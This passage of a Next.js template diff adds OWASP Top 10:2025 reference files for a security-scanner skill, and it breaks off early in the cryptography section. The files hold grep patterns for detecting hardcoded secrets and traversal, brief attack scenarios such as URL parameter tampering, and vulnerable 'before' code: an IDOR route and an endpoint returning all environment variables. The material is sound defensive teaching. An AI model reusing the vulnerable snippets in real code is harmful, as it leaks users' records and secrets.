- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-simple-expression-in-memo.md +35 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-split-combined-hooks.md +64 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-transitions.md +40 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-use-deferred-value.md +59 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-use-ref-transient-values.md +73 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-after-nonblocking.md +73 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-auth-actions.md +96 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-cache-lru.md +41 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-cache-react.md +76 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-dedup-props.md +65 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-hoist-static-io.md +149 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-no-shared-module-state.md +50 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-parallel-fetching.md +83 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-parallel-nested-fetching.md +34 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-serialization.md +38 -0
- package/template/.claude/skills/video-downloader/SKILL.md +42 -0
- package/template/.claude/skills/web-design-guidelines/SKILL.md +39 -0
- package/template/.claude/skills/webgpu-threejs-tsl/REFERENCE.md +371 -0
- package/template/.claude/skills/webgpu-threejs-tsl/SKILL.md +93 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/compute-shaders.md +578 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/core-concepts.md +497 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/device-loss.md +359 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/limits-and-features.md +133 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/materials.md +353 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/post-processing.md +515 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/wgsl-integration.md +324 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/basic-setup.js +87 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/custom-material.js +170 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/earth-shader.js +292 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/particle-system.js +259 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/post-processing.js +199 -0
- package/template/.claude/skills/webgpu-threejs-tsl/templates/compute-shader.js +343 -0
- package/template/.claude/skills/webgpu-threejs-tsl/templates/webgpu-project.js +276 -0
- package/template/.claude/skills/zoom-out/SKILL.md +7 -0
- package/template/.mcp.json +5 -0
- package/template/.nvmrc +1 -0
- package/template/.prettierignore +25 -0
- package/template/.prettierrc +11 -0
- package/template/.vscode/settings.json +1 -0
- package/template/.vscode/tasks.json.example +85 -0
- package/template/AGENTS.md +37 -0
- package/template/CLAUDE.md +75 -0
- package/template/CONTEXT.md +29 -0
- package/template/DESIGN.md +451 -0
- package/template/README.md +394 -0
- package/template/_gitignore +48 -0
- package/template/components.json +21 -0
- package/template/docker-compose.yml +9 -0
- package/template/docs/business/starter-prompt.md +94 -0
- package/template/docs/technical/ai/streaming.md +520 -0
- package/template/docs/technical/ai/structured-data.md +409 -0
- package/template/docs/technical/betterauth/polar.md +476 -0
- package/template/docs/technical/react-markdown.md +123 -0
- package/template/drizzle/0000_chilly_the_phantom.sql +50 -0
- package/template/drizzle/0001_last_warpath.sql +5 -0
- package/template/drizzle/meta/0000_snapshot.json +326 -0
- package/template/drizzle/meta/0001_snapshot.json +410 -0
- package/template/drizzle/meta/_journal.json +20 -0
- package/template/drizzle.config.ts +10 -0
- package/template/env.example +26 -0
- package/template/eslint.config.mjs +75 -0
- package/template/next-env.d.ts +6 -0
- package/template/next.config.ts +57 -0
- package/template/package.json +79 -0
- package/template/postcss.config.mjs +5 -0
- package/template/public/file.svg +1 -0
- package/template/public/globe.svg +1 -0
- package/template/public/next.svg +1 -0
- package/template/public/vercel.svg +1 -0
- package/template/public/window.svg +1 -0
- package/template/scripts/setup.ts +277 -0
- package/template/skills-lock.json +61 -0
- package/template/specs/ui-polish-responsive/README.md +59 -0
- package/template/specs/ui-polish-responsive/action-required.md +3 -0
- package/template/specs/ui-polish-responsive/requirements.md +53 -0
- package/template/specs/ui-polish-responsive/tasks/task-01-globals-css.md +144 -0
- package/template/specs/ui-polish-responsive/tasks/task-02-layout.md +66 -0
- package/template/specs/ui-polish-responsive/tasks/task-03-site-header.md +79 -0
- package/template/specs/ui-polish-responsive/tasks/task-04-site-footer.md +63 -0
- package/template/specs/ui-polish-responsive/tasks/task-05-home-page.md +215 -0
- package/template/specs/ui-polish-responsive/tasks/task-06-dashboard.md +222 -0
- package/template/specs/ui-polish-responsive/tasks/task-07-chat-page.md +225 -0
- package/template/specs/ui-polish-responsive/tasks/task-08-profile-page.md +192 -0
- package/template/specs/ui-polish-responsive/tasks/task-09-auth-pages.md +97 -0
- package/template/specs/ui-polish-responsive/tasks/task-10-setup-checklist.md +120 -0
- package/template/specs/ui-polish-responsive/tasks/task-11-starter-prompt-modal.md +87 -0
- package/template/src/app/(auth)/forgot-password/page.tsx +35 -0
- package/template/src/app/(auth)/layout.tsx +7 -0
- package/template/src/app/(auth)/login/page.tsx +44 -0
- package/template/src/app/(auth)/register/page.tsx +33 -0
- package/template/src/app/(auth)/reset-password/page.tsx +36 -0
- package/template/src/app/api/auth/[...all]/route.ts +4 -0
- package/template/src/app/api/chat/route.ts +80 -0
- package/template/src/app/api/diagnostics/route.ts +162 -0
- package/template/src/app/chat/error.tsx +46 -0
- package/template/src/app/chat/loading.tsx +42 -0
- package/template/src/app/chat/page.tsx +348 -0
- package/template/src/app/dashboard/loading.tsx +63 -0
- package/template/src/app/dashboard/page.tsx +79 -0
- package/template/src/app/error.tsx +44 -0
- package/template/src/app/favicon.ico +0 -0
- package/template/src/app/globals.css +175 -0
- package/template/src/app/layout.tsx +108 -0
- package/template/src/app/manifest.ts +21 -0
- package/template/src/app/not-found.tsx +28 -0
- package/template/src/app/page.tsx +152 -0
- package/template/src/app/profile/page.tsx +416 -0
- package/template/src/app/robots.ts +16 -0
- package/template/src/app/sitemap.ts +26 -0
- package/template/src/components/auth/forgot-password-form.tsx +83 -0
- package/template/src/components/auth/reset-password-form.tsx +107 -0
- package/template/src/components/auth/sign-in-button.tsx +97 -0
- package/template/src/components/auth/sign-out-button.tsx +31 -0
- package/template/src/components/auth/sign-up-form.tsx +121 -0
- package/template/src/components/auth/user-profile.tsx +91 -0
- package/template/src/components/setup-checklist.tsx +180 -0
- package/template/src/components/site-footer.tsx +24 -0
- package/template/src/components/site-header.tsx +46 -0
- package/template/src/components/starter-prompt-modal.tsx +202 -0
- package/template/src/components/theme-provider.tsx +11 -0
- package/template/src/components/ui/avatar.tsx +52 -0
- package/template/src/components/ui/badge.tsx +35 -0
- package/template/src/components/ui/button.tsx +58 -0
- package/template/src/components/ui/card.tsx +78 -0
- package/template/src/components/ui/dialog.tsx +142 -0
- package/template/src/components/ui/dropdown-menu.tsx +256 -0
- package/template/src/components/ui/github-stars.tsx +53 -0
- package/template/src/components/ui/input.tsx +20 -0
- package/template/src/components/ui/label.tsx +23 -0
- package/template/src/components/ui/mode-toggle.tsx +38 -0
- package/template/src/components/ui/separator.tsx +23 -0
- package/template/src/components/ui/skeleton.tsx +13 -0
- package/template/src/components/ui/sonner.tsx +42 -0
- package/template/src/components/ui/spinner.tsx +21 -0
- package/template/src/components/ui/textarea.tsx +17 -0
- package/template/src/hooks/use-diagnostics.ts +86 -0
- package/template/src/lib/auth-client.ts +16 -0
- package/template/src/lib/auth.ts +25 -0
- package/template/src/lib/db.ts +12 -0
- package/template/src/lib/env.ts +117 -0
- package/template/src/lib/schema.ts +82 -0
- package/template/src/lib/session.ts +48 -0
- package/template/src/lib/storage.ts +225 -0
- package/template/src/lib/utils.ts +6 -0
- package/template/src/proxy.ts +25 -0
- package/template/tsconfig.json +48 -0
|
@@ -0,0 +1,136 @@
|
|
|
1
|
+
# A01:2025 — Broken Access Control
|
|
2
|
+
|
|
3
|
+
## Overview
|
|
4
|
+
|
|
5
|
+
Broken Access Control is the #1 vulnerability in OWASP Top 10:2025. 100% of applications tested showed some form of broken access control. It encompasses 40 CWEs with 1,839,701 total occurrences and 32,654 CVEs. Access control enforces policy preventing users from exceeding their permissions — failures enable unauthorized data disclosure, modification, or destruction.
|
|
6
|
+
|
|
7
|
+
## Key CWEs
|
|
8
|
+
|
|
9
|
+
- **CWE-200**: Exposure of Sensitive Information to Unauthorized Actor
|
|
10
|
+
- **CWE-284**: Improper Access Control
|
|
11
|
+
- **CWE-285**: Improper Authorization
|
|
12
|
+
- **CWE-352**: Cross-Site Request Forgery (CSRF)
|
|
13
|
+
- **CWE-425**: Direct Request (Forced Browsing)
|
|
14
|
+
- **CWE-639**: Authorization Bypass Through User-Controlled Key (IDOR)
|
|
15
|
+
- **CWE-862**: Missing Authorization
|
|
16
|
+
- **CWE-863**: Incorrect Authorization
|
|
17
|
+
- **CWE-918**: Server-Side Request Forgery (SSRF)
|
|
18
|
+
- **CWE-22**: Path Traversal
|
|
19
|
+
|
|
20
|
+
## What to Look For
|
|
21
|
+
|
|
22
|
+
### General Patterns
|
|
23
|
+
- Routes/endpoints missing authentication middleware or guards
|
|
24
|
+
- Missing authorization/role checks on protected routes (any authenticated user can access admin routes)
|
|
25
|
+
- IDOR: user-controlled IDs in URLs or request bodies used to fetch records without ownership verification
|
|
26
|
+
- CORS misconfiguration (wildcard `*` or overly permissive origins)
|
|
27
|
+
- Directory traversal in file paths (user input used in `path.join`, `fs.readFile`, etc.)
|
|
28
|
+
- CSRF: state-changing operations (POST/PUT/DELETE) without CSRF token validation
|
|
29
|
+
- Privilege escalation: missing role checks, role stored client-side or in JWT without verification
|
|
30
|
+
- Force browsing: admin/debug/internal endpoints accessible without auth
|
|
31
|
+
|
|
32
|
+
### Grep Patterns
|
|
33
|
+
|
|
34
|
+
```
|
|
35
|
+
# Missing auth middleware on routes
|
|
36
|
+
Access-Control-Allow-Origin.*\*
|
|
37
|
+
Access-Control-Allow-Credentials.*true
|
|
38
|
+
|
|
39
|
+
# IDOR patterns — user-controlled ID without ownership check
|
|
40
|
+
params\.id|params\.userId|req\.query\.id
|
|
41
|
+
request\.getParameter\("acct"\)
|
|
42
|
+
findById|findOne.*id
|
|
43
|
+
|
|
44
|
+
# Path traversal
|
|
45
|
+
path\.join.*req\.|path\.resolve.*req\.
|
|
46
|
+
\.\.\/|\.\.\\
|
|
47
|
+
|
|
48
|
+
# Missing CSRF
|
|
49
|
+
method.*(POST|PUT|DELETE|PATCH)
|
|
50
|
+
csrf|csrfToken|_csrf
|
|
51
|
+
|
|
52
|
+
# Force browsing / unprotected admin
|
|
53
|
+
/admin|/debug|/internal|/api/admin
|
|
54
|
+
```
|
|
55
|
+
|
|
56
|
+
### JavaScript / TypeScript / Node.js
|
|
57
|
+
- Express/Next.js routes without auth middleware (`getSession`, `getServerSession`, `requireAuth`)
|
|
58
|
+
- API routes that read `params.id` or `query.id` and fetch records without checking ownership against session user
|
|
59
|
+
- `next.config.js` with permissive CORS headers
|
|
60
|
+
- Missing `withAuth` or session validation wrappers on API handlers
|
|
61
|
+
|
|
62
|
+
### Python (Django/Flask)
|
|
63
|
+
- Views without `@login_required` or `@permission_required` decorators
|
|
64
|
+
- `request.GET['id']` used directly in queries without ownership filter
|
|
65
|
+
- Missing `CSRF_COOKIE_SECURE` or `CSRF_COOKIE_HTTPONLY` settings
|
|
66
|
+
- `CORS_ALLOW_ALL_ORIGINS = True`
|
|
67
|
+
|
|
68
|
+
### Java (Spring)
|
|
69
|
+
- Controllers without `@PreAuthorize` or `@Secured` annotations
|
|
70
|
+
- Missing `SecurityFilterChain` configuration
|
|
71
|
+
- `@CrossOrigin(origins = "*")`
|
|
72
|
+
- Direct use of `request.getParameter()` in database queries without authorization
|
|
73
|
+
|
|
74
|
+
## Prevention Measures
|
|
75
|
+
|
|
76
|
+
1. Deny by default — restrict access except for public resources
|
|
77
|
+
2. Implement centralized, reusable access control mechanisms
|
|
78
|
+
3. Enforce record ownership — users can only access their own records
|
|
79
|
+
4. Apply business logic constraints through domain models
|
|
80
|
+
5. Disable directory listing; remove metadata/backups from web roots
|
|
81
|
+
6. Log access control failures; alert administrators on suspicious patterns
|
|
82
|
+
7. Rate limit API/controller access
|
|
83
|
+
8. Invalidate sessions server-side on logout; use short-lived JWTs
|
|
84
|
+
9. Include functional access control tests in unit and integration suites
|
|
85
|
+
|
|
86
|
+
## Example Attack Scenarios
|
|
87
|
+
|
|
88
|
+
**Scenario 1 — Parameter Tampering:**
|
|
89
|
+
```
|
|
90
|
+
https://example.com/app/accountInfo?acct=notmyacct
|
|
91
|
+
```
|
|
92
|
+
Attacker modifies the `acct` parameter to access any user's account.
|
|
93
|
+
|
|
94
|
+
**Scenario 2 — Forced Browsing:**
|
|
95
|
+
```
|
|
96
|
+
https://example.com/app/admin_getappInfo
|
|
97
|
+
```
|
|
98
|
+
Unauthenticated users access admin pages via direct URL.
|
|
99
|
+
|
|
100
|
+
**Scenario 3 — Client-Side Only Controls:**
|
|
101
|
+
```bash
|
|
102
|
+
curl https://example.com/app/admin_getappInfo
|
|
103
|
+
```
|
|
104
|
+
Frontend JavaScript protections bypassed via direct API calls.
|
|
105
|
+
|
|
106
|
+
## Fix Examples
|
|
107
|
+
|
|
108
|
+
**Before (IDOR vulnerability):**
|
|
109
|
+
```typescript
|
|
110
|
+
// Any authenticated user can access any note
|
|
111
|
+
export async function GET(req, { params }) {
|
|
112
|
+
const note = await db.get('SELECT * FROM notes WHERE id = ?', params.id);
|
|
113
|
+
return Response.json(note);
|
|
114
|
+
}
|
|
115
|
+
```
|
|
116
|
+
|
|
117
|
+
**After (ownership check):**
|
|
118
|
+
```typescript
|
|
119
|
+
export async function GET(req, { params }) {
|
|
120
|
+
const session = await getSession(req);
|
|
121
|
+
if (!session) return Response.json({ error: 'Unauthorized' }, { status: 401 });
|
|
122
|
+
const note = await db.get(
|
|
123
|
+
'SELECT * FROM notes WHERE id = ? AND user_id = ?',
|
|
124
|
+
[params.id, session.userId]
|
|
125
|
+
);
|
|
126
|
+
if (!note) return Response.json({ error: 'Not found' }, { status: 404 });
|
|
127
|
+
return Response.json(note);
|
|
128
|
+
}
|
|
129
|
+
```
|
|
130
|
+
|
|
131
|
+
## References
|
|
132
|
+
|
|
133
|
+
- [OWASP A01:2025](https://owasp.org/Top10/2025/A01_2025-Broken_Access_Control/)
|
|
134
|
+
- OWASP Proactive Controls: C1 Access Control
|
|
135
|
+
- OWASP ASVS V8 Authorization
|
|
136
|
+
- OWASP Authorization Cheat Sheet
|
|
@@ -0,0 +1,130 @@
|
|
|
1
|
+
# A02:2025 — Security Misconfiguration
|
|
2
|
+
|
|
3
|
+
## Overview
|
|
4
|
+
|
|
5
|
+
Security Misconfiguration is #2 in OWASP Top 10:2025. 100% of applications tested showed some form of misconfiguration with 719,084 total occurrences across 16 CWEs. This occurs when systems lack proper security setup — missing hardening, unnecessary features enabled, default credentials, verbose errors, or insecure settings.
|
|
6
|
+
|
|
7
|
+
## Key CWEs
|
|
8
|
+
|
|
9
|
+
- **CWE-16**: Configuration
|
|
10
|
+
- **CWE-260**: Password in Configuration File
|
|
11
|
+
- **CWE-489**: Active Debug Code
|
|
12
|
+
- **CWE-526**: Exposure of Environment Variables
|
|
13
|
+
- **CWE-547**: Use of Hard-Coded Security-Relevant Constants
|
|
14
|
+
- **CWE-611**: Improper Restriction of XML External Entity Reference
|
|
15
|
+
- **CWE-614**: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
|
|
16
|
+
- **CWE-942**: Permissive Cross-domain Policy
|
|
17
|
+
- **CWE-1004**: Sensitive Cookie Without 'HttpOnly' Flag
|
|
18
|
+
|
|
19
|
+
## What to Look For
|
|
20
|
+
|
|
21
|
+
### General Patterns
|
|
22
|
+
- Debug/development mode enabled in production configs
|
|
23
|
+
- Default credentials left in code or config (admin/admin, root/root, test/test)
|
|
24
|
+
- Verbose error messages exposing stack traces, SQL queries, or internal paths to users
|
|
25
|
+
- Unnecessary features/services enabled (directory listing, debug endpoints, sample apps)
|
|
26
|
+
- Missing security headers (CSP, HSTS, X-Frame-Options, X-Content-Type-Options)
|
|
27
|
+
- Overly permissive CORS (Access-Control-Allow-Origin: *)
|
|
28
|
+
- Server/framework version headers enabled (X-Powered-By, Server)
|
|
29
|
+
- Hardcoded secrets in source code (API keys, passwords, tokens)
|
|
30
|
+
- Environment variables exposed via debug endpoints or error pages
|
|
31
|
+
- XML external entity processing enabled
|
|
32
|
+
|
|
33
|
+
### Grep Patterns
|
|
34
|
+
|
|
35
|
+
```
|
|
36
|
+
# Debug/development mode
|
|
37
|
+
DEBUG\s*=\s*[Tt]rue|debug\s*:\s*true|NODE_ENV.*development
|
|
38
|
+
poweredByHeader|x-powered-by
|
|
39
|
+
|
|
40
|
+
# Default credentials
|
|
41
|
+
admin.*admin|password.*password|root.*root|test.*test
|
|
42
|
+
default.*password|default.*credential
|
|
43
|
+
|
|
44
|
+
# Verbose errors returned to client
|
|
45
|
+
err\.stack|error\.stack|stackTrace|stack_trace
|
|
46
|
+
err\.message|error\.message|e\.getMessage
|
|
47
|
+
|
|
48
|
+
# Missing security headers
|
|
49
|
+
Content-Security-Policy|X-Frame-Options|X-Content-Type-Options
|
|
50
|
+
Strict-Transport-Security|Referrer-Policy
|
|
51
|
+
|
|
52
|
+
# Exposed environment/config
|
|
53
|
+
process\.env|os\.environ|System\.getenv
|
|
54
|
+
/debug|/health|/status|/info|/env|/actuator
|
|
55
|
+
|
|
56
|
+
# Hardcoded secrets
|
|
57
|
+
SECRET.*=.*['"]|API_KEY.*=.*['"]|PASSWORD.*=.*['"]
|
|
58
|
+
private_key|secret_key|access_token
|
|
59
|
+
```
|
|
60
|
+
|
|
61
|
+
### JavaScript / TypeScript / Node.js
|
|
62
|
+
- `next.config.js` with `poweredByHeader: true` or missing security headers
|
|
63
|
+
- Express without `helmet` middleware
|
|
64
|
+
- `.env` or `.env.local` files with secrets not in `.gitignore`
|
|
65
|
+
- Debug routes like `/api/debug` or `/api/health` exposing internal state
|
|
66
|
+
- `console.log` of sensitive config values
|
|
67
|
+
- Error handlers returning `err.stack` or `err.message` to client
|
|
68
|
+
|
|
69
|
+
### Python (Django/Flask)
|
|
70
|
+
- `DEBUG = True` in production settings
|
|
71
|
+
- `ALLOWED_HOSTS = ['*']`
|
|
72
|
+
- `SECRET_KEY` hardcoded in settings.py
|
|
73
|
+
- Flask debug mode: `app.run(debug=True)`
|
|
74
|
+
|
|
75
|
+
### Java (Spring)
|
|
76
|
+
- `spring.jpa.show-sql=true` in production
|
|
77
|
+
- Actuator endpoints exposed without authentication (`/actuator/env`, `/actuator/beans`)
|
|
78
|
+
- `server.error.include-stacktrace=always`
|
|
79
|
+
|
|
80
|
+
## Prevention Measures
|
|
81
|
+
|
|
82
|
+
1. Automate deployment of locked-down environments with unique credentials per environment
|
|
83
|
+
2. Remove unnecessary features, components, samples, and documentation
|
|
84
|
+
3. Review and update configurations with each security patch
|
|
85
|
+
4. Implement segmented architecture (containerization, cloud security groups)
|
|
86
|
+
5. Send security directives to clients via headers (CSP, HSTS, etc.)
|
|
87
|
+
6. Automate configuration verification across all environments
|
|
88
|
+
7. Centralize error handling — never expose stack traces or internal details to users
|
|
89
|
+
8. Use identity federation and short-lived credentials instead of static secrets
|
|
90
|
+
|
|
91
|
+
## Example Attack Scenarios
|
|
92
|
+
|
|
93
|
+
**Scenario 1:** Sample applications with known vulnerabilities remain on production servers. Default admin credentials unchanged.
|
|
94
|
+
|
|
95
|
+
**Scenario 2:** Directory listing enabled, allowing attackers to download compiled classes for reverse engineering.
|
|
96
|
+
|
|
97
|
+
**Scenario 3:** Detailed error messages with stack traces and component versions returned to users.
|
|
98
|
+
|
|
99
|
+
**Scenario 4:** Cloud storage defaults to public access, exposing sensitive data.
|
|
100
|
+
|
|
101
|
+
## Fix Examples
|
|
102
|
+
|
|
103
|
+
**Before (debug endpoint exposing environment):**
|
|
104
|
+
```typescript
|
|
105
|
+
export async function GET() {
|
|
106
|
+
return Response.json({
|
|
107
|
+
env: process.env,
|
|
108
|
+
nodeVersion: process.version,
|
|
109
|
+
uptime: process.uptime()
|
|
110
|
+
});
|
|
111
|
+
}
|
|
112
|
+
```
|
|
113
|
+
|
|
114
|
+
**After (remove debug endpoint entirely, or protect it):**
|
|
115
|
+
```typescript
|
|
116
|
+
// Delete the debug endpoint entirely in production.
|
|
117
|
+
// If needed for ops, protect with admin auth and filter sensitive values:
|
|
118
|
+
export async function GET(req) {
|
|
119
|
+
const session = await getAdminSession(req);
|
|
120
|
+
if (!session?.isAdmin) return Response.json({ error: 'Forbidden' }, { status: 403 });
|
|
121
|
+
return Response.json({ uptime: process.uptime(), nodeEnv: process.env.NODE_ENV });
|
|
122
|
+
}
|
|
123
|
+
```
|
|
124
|
+
|
|
125
|
+
## References
|
|
126
|
+
|
|
127
|
+
- [OWASP A02:2025](https://owasp.org/Top10/2025/A02_2025-Security_Misconfiguration/)
|
|
128
|
+
- OWASP Testing Guide: Configuration Management
|
|
129
|
+
- OWASP ASVS V13 Configuration
|
|
130
|
+
- CIS Security Configuration Guides
|
package/template/.agents/skills/security-scanner/references/A03-software-supply-chain-failures.md
ADDED
|
@@ -0,0 +1,117 @@
|
|
|
1
|
+
# A03:2025 — Software Supply Chain Failures
|
|
2
|
+
|
|
3
|
+
## Overview
|
|
4
|
+
|
|
5
|
+
Software Supply Chain Failures is #3 in OWASP Top 10:2025. This category covers compromises in building, distributing, or updating software — vulnerabilities or malicious changes embedded in third-party code, tools, or dependencies. Notable incidents include SolarWinds (2019, 18,000 orgs compromised), Bybit ($1.5B theft, 2025), and Log4Shell (CVE-2021-44228).
|
|
6
|
+
|
|
7
|
+
## Key CWEs
|
|
8
|
+
|
|
9
|
+
- **CWE-937**: Using Components with Known Vulnerabilities
|
|
10
|
+
- **CWE-1035**: Using Components from Untrusted Sources
|
|
11
|
+
- **CWE-1104**: Use of Unmaintained Third-Party Components
|
|
12
|
+
- **CWE-829**: Inclusion of Functionality from Untrusted Control Sphere
|
|
13
|
+
- **CWE-494**: Download of Code Without Integrity Check
|
|
14
|
+
- **CWE-506**: Embedded Malicious Code
|
|
15
|
+
|
|
16
|
+
## What to Look For
|
|
17
|
+
|
|
18
|
+
### General Patterns
|
|
19
|
+
- Known vulnerable dependency versions in package manifests
|
|
20
|
+
- Unpinned or wildcard dependency versions (`*`, `^`, `~` with major ranges)
|
|
21
|
+
- CDN scripts loaded without Subresource Integrity (SRI) hashes
|
|
22
|
+
- Missing lock files or significantly outdated lock files
|
|
23
|
+
- Dependencies from unofficial or untrusted registries
|
|
24
|
+
- No Software Bill of Materials (SBOM) tracking
|
|
25
|
+
- Single-person deployment without review gates
|
|
26
|
+
- CI/CD pipeline configs with weaker security than production
|
|
27
|
+
- Transitive dependencies not tracked or audited
|
|
28
|
+
|
|
29
|
+
### Grep Patterns
|
|
30
|
+
|
|
31
|
+
```
|
|
32
|
+
# Wildcard or loose versioning
|
|
33
|
+
"\*"|"latest"|"\^0\."
|
|
34
|
+
">="|"<="|"~"
|
|
35
|
+
|
|
36
|
+
# CDN scripts without integrity
|
|
37
|
+
<script.*src=.*cdn|<link.*href=.*cdn
|
|
38
|
+
integrity=|crossorigin=
|
|
39
|
+
|
|
40
|
+
# Known vulnerable patterns (check versions)
|
|
41
|
+
lodash.*4\.17\.(0|1[0-1]) # prototype pollution
|
|
42
|
+
axios.*0\.21\.[0-1] # SSRF
|
|
43
|
+
jsonwebtoken.*[5-8]\. # various CVEs
|
|
44
|
+
log4j.*2\.(0|1[0-6]) # Log4Shell
|
|
45
|
+
|
|
46
|
+
# Package manifest files to check
|
|
47
|
+
package\.json|requirements\.txt|Gemfile|go\.mod|pom\.xml|Cargo\.toml|\.csproj
|
|
48
|
+
```
|
|
49
|
+
|
|
50
|
+
### JavaScript / TypeScript / Node.js
|
|
51
|
+
- Check `package.json` dependency versions against known CVEs
|
|
52
|
+
- Look for `<script src="https://cdn...">` without `integrity` attribute in HTML/JSX
|
|
53
|
+
- Run `npm audit` or `yarn audit` mentally — flag packages with known issues
|
|
54
|
+
- Check for `package-lock.json` / `yarn.lock` existence and freshness
|
|
55
|
+
- Flag use of deprecated packages (e.g., `request`, `querystring`)
|
|
56
|
+
|
|
57
|
+
### Python
|
|
58
|
+
- Check `requirements.txt` for pinned versions with known CVEs
|
|
59
|
+
- Look for `pip install` without `--require-hashes`
|
|
60
|
+
- Check for `Pipfile.lock` or `poetry.lock`
|
|
61
|
+
|
|
62
|
+
### Java
|
|
63
|
+
- Check `pom.xml` dependency versions against known CVEs
|
|
64
|
+
- Look for `<repository>` entries pointing to unofficial Maven repos
|
|
65
|
+
- Flag old Spring, Log4j, Jackson, or Apache Commons versions
|
|
66
|
+
|
|
67
|
+
## Prevention Measures
|
|
68
|
+
|
|
69
|
+
1. Generate and maintain Software Bill of Materials (SBOM)
|
|
70
|
+
2. Track all direct and transitive dependencies
|
|
71
|
+
3. Remove unused dependencies and unnecessary components
|
|
72
|
+
4. Continuously monitor for CVEs (OWASP Dependency Check, Snyk, npm audit)
|
|
73
|
+
5. Obtain components only from official, trusted sources via secure channels
|
|
74
|
+
6. Implement Subresource Integrity (SRI) for all CDN-loaded resources
|
|
75
|
+
7. Pin dependency versions and use lock files
|
|
76
|
+
8. Implement staged rollouts, not simultaneous deployments
|
|
77
|
+
9. Harden CI/CD pipelines with MFA and access controls
|
|
78
|
+
10. Require code review for all changes before merge
|
|
79
|
+
|
|
80
|
+
## Example Attack Scenarios
|
|
81
|
+
|
|
82
|
+
**SolarWinds (2019):** Trusted vendor infiltrated — malware propagated to 18,000 orgs via software updates.
|
|
83
|
+
|
|
84
|
+
**Log4Shell (2021):** CVE-2021-44228 in Apache Log4j enabled remote code execution, affecting millions of Java applications.
|
|
85
|
+
|
|
86
|
+
**Shai-Hulud (2025):** First self-propagating npm worm infected 500+ package versions, harvesting developer credentials.
|
|
87
|
+
|
|
88
|
+
## Fix Examples
|
|
89
|
+
|
|
90
|
+
**Before (CDN without SRI):**
|
|
91
|
+
```html
|
|
92
|
+
<script src="https://cdn.example.com/lib.min.js"></script>
|
|
93
|
+
```
|
|
94
|
+
|
|
95
|
+
**After (CDN with SRI):**
|
|
96
|
+
```html
|
|
97
|
+
<script src="https://cdn.example.com/lib.min.js"
|
|
98
|
+
integrity="sha384-abc123..."
|
|
99
|
+
crossorigin="anonymous"></script>
|
|
100
|
+
```
|
|
101
|
+
|
|
102
|
+
**Before (loose dependency versions):**
|
|
103
|
+
```json
|
|
104
|
+
{ "lodash": "^4.17.0", "axios": "*" }
|
|
105
|
+
```
|
|
106
|
+
|
|
107
|
+
**After (pinned versions, updated):**
|
|
108
|
+
```json
|
|
109
|
+
{ "lodash": "4.17.21", "axios": "1.7.2" }
|
|
110
|
+
```
|
|
111
|
+
|
|
112
|
+
## References
|
|
113
|
+
|
|
114
|
+
- [OWASP A03:2025](https://owasp.org/Top10/2025/A03_2025-Software_Supply_Chain_Failures/)
|
|
115
|
+
- OWASP Dependency Check / Dependency Track
|
|
116
|
+
- CycloneDX SBOM Standard
|
|
117
|
+
- OWASP ASVS: Component Verification
|
|
@@ -0,0 +1,141 @@
|
|
|
1
|
+
# A04:2025 — Cryptographic Failures
|
|
2
|
+
|
|
3
|
+
## Overview
|
|
4
|
+
|
|
5
|
+
Cryptographic Failures is #4 in OWASP Top 10:2025 (down from #2). It covers failures related to lack of cryptography, insufficiently strong cryptography, leaking of cryptographic keys, and related errors. 32 CWEs mapped, 1,665,348 total occurrences, 2,185 CVEs.
|
|
6
|
+
|
|
7
|
+
## Key CWEs
|
|
8
|
+
|
|
9
|
+
- **CWE-261**: Weak Encoding for Password
|
|
10
|
+
- **CWE-319**: Cleartext Transmission of Sensitive Information
|
|
11
|
+
- **CWE-321**: Use of Hard-coded Cryptographic Key
|
|
12
|
+
- **CWE-326**: Inadequate Encryption Strength
|
|
13
|
+
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
|
|
14
|
+
- **CWE-328**: Reversible One-Way Hash
|
|
15
|
+
- **CWE-330**: Use of Insufficiently Random Values
|
|
16
|
+
- **CWE-338**: Use of Cryptographically Weak PRNG
|
|
17
|
+
- **CWE-759**: Use of One-Way Hash Without a Salt
|
|
18
|
+
- **CWE-916**: Use of Password Hash With Insufficient Computational Effort
|
|
19
|
+
|
|
20
|
+
## What to Look For
|
|
21
|
+
|
|
22
|
+
### General Patterns
|
|
23
|
+
- Weak hashing algorithms used for passwords (MD5, SHA1, SHA256 without key stretching)
|
|
24
|
+
- Missing salt in password hashing
|
|
25
|
+
- Hardcoded cryptographic keys, secrets, or API keys in source code
|
|
26
|
+
- Sensitive data transmitted without encryption (HTTP, FTP, SMTP)
|
|
27
|
+
- Weak random number generation for security tokens (Math.random, rand())
|
|
28
|
+
- Cookies missing `Secure` flag (sent over HTTP)
|
|
29
|
+
- Sensitive data in logs (passwords, tokens, credit cards, PII)
|
|
30
|
+
- Base64 encoding used as "encryption" for tokens or secrets
|
|
31
|
+
- Deprecated crypto algorithms (DES, 3DES, RC4, MD5, SHA1)
|
|
32
|
+
- Missing HSTS headers
|
|
33
|
+
- Hardcoded IVs or nonces in encryption
|
|
34
|
+
|
|
35
|
+
### Grep Patterns
|
|
36
|
+
|
|
37
|
+
```
|
|
38
|
+
# Weak hashing
|
|
39
|
+
